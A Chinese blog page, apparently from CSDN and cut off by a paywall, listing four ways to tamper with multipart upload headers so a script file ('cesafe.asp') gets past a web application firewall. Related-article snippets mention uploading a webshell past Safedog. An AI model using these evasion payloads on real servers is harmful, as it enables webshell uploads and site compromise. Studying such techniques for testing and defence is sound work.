文件上传绕过waf的方法

最新推荐文章于 2024-04-23 10:30:00 发布
最新推荐文章于 2024-04-23 10:30:00 发布
阅读量647 收藏 7
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/licheric/article/details/109693155
版权

原始请求包:
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”

Content-Type: text/html

方法1,文件名前缀加[0x09]绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”[0x09]cesafe.asp”

Content-Type: text/html

方法2,文件名去掉双引号绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=cesafe.asp

Content-Type: text/html

方法3,添加一个filename1的文件名参数,并赋值绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”;filename1=”test.jpg”

Content-Type: text/html

方法4,form变量改成f+orm组合绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: f+orm-data; name=”filepath”;filename&

最低0.47元/天 解锁文章
licheric
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传绕过的一些姿势
weixin_37104668的博客
03-12 1231
WAF绕过 1.绕过思路:对文件的内容,数据。数据包进行处理。 关键点在这里Content-Disposition: form-data; name=“file”; filename=“ian.php” 将form-data; 修改为~form-data; 2.通过替换大小写来进行绕过 Content-Disposition: form-data; name=“file”; ...
multipart/form-data 文件上传表单中 传递参数无法获取的原因!
weixin_30647065的博客
07-26 1388
1.什么是multipart/form-data 首先我们需要明白在html中的enctype属性, enctype:规定了form表单在发送到服务器时候编码方式。他有如下的三个值。 ①application/x-www-form-urlencoded。默认的编码方式。 但是在用文本的传输和MP3等大型文件的时候,使用这种编码就显得 效率低下。 ②multipart/form-data 。 指定...
WAF绕过文件上传
最新发布
wangluoanquan111的博客
04-23 1339
环境:安全狗,DVWA我们上传一个一句话木马,被拦截!但是我们并不知道waf拦截我们的机制所以我们可以采用控制变量法:准备两个文件:1.txt 和1.php文件中写入相同的内容:<?然后上传并抓包1.txt可以成功上传:!1.php上传失败:!那我们可以先猜测它是通过后缀名来判断的接下来我们在判断是否是通过content-type来进行拦截我们上传1.txt文件,抓包修改content-type为:application/octet-stream!
http上传/下载文件时,Content-Disposition的使用
衍夏成歌的博客
04-27 7万+
Content-disposition是 MIME 协议的扩展,MIME 协议指示 MIME 用户代理如何显示附加的文件。当 Internet Explorer 接收到头时,它会激活文件下载对话框,它的文件名框自动填充了头中指定的文件名。(请注意,这是设计导致的;无法使用此功能将文档保存到用户的计算机上,而不向用户询问保存位置。) Rfc1867中可查 1.      上传文件请求头: Co
利用 xmlhttp 分块上传文件
微笑的黄捷
08-30 1408
编写思路:把本地文件在客户端通过base64编码以后发送目的地.测试过程中,上传文件过大,导致超时不成功.后来经过改善.把编码分段发送.测试20M成功编写目的:在传统的解决方案里面,一次一次选取上传可以.但是在碰到把数据库里文件路径读出来,并把这些文件上传到一个地方的时候就比较麻烦.如果得到路径一个一个去找到用ftp当然也是可以的,但每次找这些文件我看都会比较费时。这里编写这个主要就是为了通过
四种常见的 POST 提交数据方式 专题
weixin_43689953的博客
08-15 1907
定义和用法 enctype 属性规定在发送到服务器之前应该如何对表单数据进行编码。默认地,表单数据会编码为 "application/x-www-form-urlencoded"。就是说,在发送到服务器之前,所有字符都会进行编码(空格转换为 "+" 加号,特殊符号转换为 ASCII HEX 值)。 enctype属性值 值描述 application/x-www-form-urlencoded 在发送前编码所有字符(默认) multipart/form-data 不对字符编码。 在使用...
上传绕过WAF的15中姿势
06-29
绕过WAF进行文件上传的文旦,可以学习一些姿势加以利用。
2022年文件上传漏洞绕过姿势整理,过waf
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
文件上传绕过思路总结 - 先知社区1
08-03
例如,通过在文件名中插入分号来绕过WAF的后缀检查,但被后端接收时,分号后的部分仍会被解析。 6. **Fuzzing后缀名**: 对各种后缀名进行模糊测试,寻找可能未被WAF过滤的文件类型,特别是针对开发自定义过滤规则...
Charset_encoding-Burp:利用字符集编码绕过waf的burpsuite插件
05-18
BurpSuite Plugin通过字符集编码绕过waf的burp插件因为小伙伴在实战中有这么个需求(利用字符集编码绕过waf),所以我借着他的这个需求也学习了下burp插件的编写。预览ASP.NET+IIS使用说明其实这种方法很早就出来了...
类继承成绕过.php
10-30
知识星球Sariel分享,类继承绕过。可轻松过D盾。反正现在能用
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
Post请求的3种编码格式:application/x-www-form-urlencoded和multipart/form-data和application/json
Hello_Error
09-21 7万+
一、前端表单提交时 application/x-www-form-urlencoded 表单代码: <form action="http://localhost:8888/task/" method="POST"> First name: <input type="text" name="firstName" value="Mickey&"><br&g...
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
CTFshow之36Dweb做题记录
bmth666的博客
08-08 2211
WEB_给你shell 打开题目首先F12,得到信息 那么?view_source=flag.txt得到了源码: <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset(...
wuyun知识库目录
Grey的博客
01-15 7205
1269.利用Office宏及Powershell的针对性攻击样本分析2016-06-24 1268.SQL注入关联分析2016-06-24 1267.Android安全开发之ZIP文件目录遍历2016-06-23 1266.search-guard 在 Elasticsearch 2.3 上的运用2016-06-23 1265.签名加密破除-burp插件在app接口fuzz中的运用201
命令执行漏洞利用及连接符的简单绕过
Thunderclap的博客
02-23 327
命令执行漏洞利用及连接符的简单绕过
WAF Bypass】文件上传绕过waf姿势总结
m0_46103905的博客
06-01 1564
总结了文件上传waf的一些姿势,以及针对网站安全狗进行了实战演练。
如何防止文件上传绕过WAF
05-20
要防止文件上传绕过WAF,可以采取以下措施: 1. 文件扩展名过滤:通过对上传文件的扩展名进行过滤,只允许上传指定类型的文件。同时,需要注意的是,黑名单式的过滤不如白名单式的过滤安全。 2. MIME类型过滤:WAF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值